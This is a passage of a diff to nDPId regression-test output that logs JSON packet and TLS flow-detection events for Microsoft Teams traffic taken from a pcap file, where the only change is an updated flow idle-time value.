-00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1587041685280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685280,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VD9AAGwGx0kofgkHwKgBBgG77IwJMzAcxeiHxqASIADLBQAAAgQFoAEDAwgEAggKUkq4VzCEuV0="} -00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1587041685280,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685280,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5HAqAEGKH4JB+yMAbvF6IfGCTMwHYAQEAkJnwAAAQEICjCEuXRSSrhX"} 
-00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} -00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VA1AAGwGd200ck0hwKgBBgG77IvHJo2qMLP5JqASIAAqDQAAAgQFoAEDAwgEAggKYR8CxDCEuVo="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyLAbsws\/kmxyaNq4AQEAlolwAAAQEICjCEuYBhHwLE"} 
-00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} -01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1814,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":2,"flow_last_seen":1587041685261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685261,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0jN1AAG0Ge5k0cg8twKgBBgG77IfA1AaRAv0Ol4AS\/\/+iigAAAgQFoAEDAwgBAQQC"} +00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1815,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1587041685261,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685261,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGNYPAqAEGNHIPLeyHAbsC\/Q6XwNQGklAQIADDSQAA"} 
+00990{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1816,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685106,"flow_last_seen":1587041685262,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1587041685262,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01338{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1824,"source":"teams.pcap","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1587041685240,"flow_last_seen":1587041685269,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6122,"flow_avg_l4_payload_len":510,"midstream":0,"thread_ts_msec":1587041685269,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60554,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"config.teams.microsoft.com","server_names":"*.config.teams.microsoft.com,config.teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"7d8fd34fdb13a7fff30d5a52846b6c4c","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 1","subjectDN":"CN=config.teams.microsoft.com","fingerprint":"B9:54:54:12:C9:E9:43:65:10:70:04:7B:AD:B6:0C:46:06:38:A5:FA"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1828,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":2,"flow_last_seen":1587041685278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685278,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8aa1AAGwGYc00ck0hwKgBBgG77IgacWa+co2TlKASIABIJQAAAgQFoAEDAwgEAggKYR7cGTCEuUo="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1829,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_packet_id":3,"flow_last_seen":1587041685278,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685278,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyIAbtyjZOUGnFmv4AQEAmGrAAAAQEICjCEuXNhHtwZ"} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1830,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685232,"flow_last_seen":1587041685278,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1587041685278,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1833,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1587041685280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685280,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VD9AAGwGx0kofgkHwKgBBgG77IwJMzAcxeiHxqASIADLBQAAAgQFoAEDAwgEAggKUkq4VzCEuV0="} +00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1834,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1587041685280,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685280,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAGR5HAqAEGKH4JB+yMAbvF6IfGCTMwHYAQEAkJnwAAAQEICjCEuXRSSrhX"} 
+00905{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1835,"source":"teams.pcap","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685251,"flow_last_seen":1587041685281,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":61,"midstream":0,"thread_ts_msec":1587041685281,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"40.126.9.7","src_port":60556,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Microsoft365","breed":"Acceptable","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"login.microsoftonline.com","ja3":"a69708a64f853c3bcc214c2c5faf84f3","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,h2-16,h2-15,h2-14,spdy\/3.1,spdy\/3,http\/1.1"}} +00478{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1587041685294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1587041685294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA8VA1AAGwGd200ck0hwKgBBgG77IvHJo2qMLP5JqASIAAqDQAAAgQFoAEDAwgEAggKYR8CxDCEuVo="} +00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1587041685294,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAA0AABAAEAG94LAqAEGNHJNIeyLAbsws\/kmxyaNq4AQEAlolwAAAQEICjCEuYBhHwLE"} 
+00973{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1843,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685248,"flow_last_seen":1587041685294,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":190,"flow_tot_l4_payload_len":190,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041685294,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": {"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} +01502{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1864,"source":"teams.pcap","alias":"nDPId-test","flow_id":42,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1587041685232,"flow_last_seen":1587041685327,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":4409,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1587041685327,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60552,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"a1674500365bdd882188db63730e69a2","ja3s":"ae4edc6faf64d08308082ad26be60767","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} +01503{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1874,"source":"teams.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685248,"flow_last_seen":1587041685350,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":6269,"flow_avg_l4_payload_len":569,"midstream":0,"thread_ts_msec":1587041685350,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.77.33","src_port":60555,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Microsoft","breed":"Safe","category":"Cloud"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"mobile.pipe.aria.microsoft.com","server_names":"*.events.data.microsoft.com,events.data.microsoft.com,*.pipe.aria.microsoft.com,pipe.skype.com,*.pipe.skype.com,*.mobile.events.data.microsoft.com,mobile.events.data.microsoft.com,*.events.data.msn.com,events.data.msn.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 4","subjectDN":"CN=*.events.data.microsoft.com","fingerprint":"33:B3:B7:E9:DA:25:F5:A0:04:E9:63:87:B6:FB:54:77:DB:ED:27:EB"}} 00185{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041685406} 00358{"packet_event_id":1,"packet_event_name":"packet","packet_id":1897,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685403,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} -01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": 
{"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} +01378{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":1908,"source":"teams.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"info","flow_packets_processed":11,"flow_first_seen":1587041685106,"flow_last_seen":1587041685420,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1452,"flow_tot_l4_payload_len":6165,"flow_avg_l4_payload_len":560,"midstream":0,"thread_ts_msec":1587041685420,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.114.15.45","src_port":60551,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"trouter2-asse-a.trouter.teams.microsoft.com","server_names":"*.trouter.teams.microsoft.com,go.trouter.io,*.drip.trouter.io,*.dc.trouter.io","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"986571066668055ae9481cb84fda634a","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384","issuerDN":"C=US, ST=Washington, L=Redmond, O=Microsoft Corporation, OU=Microsoft IT, CN=Microsoft IT TLS CA 
2","subjectDN":"CN=*.trouter.teams.microsoft.com","fingerprint":"DD:24:DF:0E:F3:63:CC:10:B5:03:CF:34:EB:A5:14:8B:97:90:9B:D4"}} 00182{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041685611} 00347{"packet_event_id":1,"packet_event_name":"packet","packet_id":1979,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041685546,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041685984,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1587041685984,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2018,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":1,"flow_last_seen":1587041685984,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1587041685984,"pkt":"EBMx8Tl2KDc3AG3ICABFAABAAABAAEAGghTAqAEGNHHChOyNAbtKVk3bAAAAALAC\/\/8LQAAAAgQFtAEDAwUBAQgKMIS8GgAAAAAEAgAA"} 
-00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2019,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1587041685996,"pkt":"KDc3AG3IEBMx8Tl2CABFAAA0TQBAAHUGACA0ccKEwKgBBgG77I3LqgPISlZN3IAS\/\/9gggAAAgQFoAEDAwgBAQQC"} -00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2020,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1587041685996,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041685996,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGgizAqAEGNHHChOyNAbtKVk3cy6oDyVAQIACBQQAA"} -00968{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2021,"source":"teams.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1587041685984,"flow_last_seen":1587041685997,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":179,"flow_tot_l4_payload_len":179,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1587041685997,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"52.113.194.132","src_port":60557,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Teams","breed":"Safe","category":"Collaborative"},"tls": {"version":"TLSv1.2","client_requested_server_name":"teams.microsoft.com","ja3":"e4d448cdfe06dc1243c1eb026c74ac9a","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
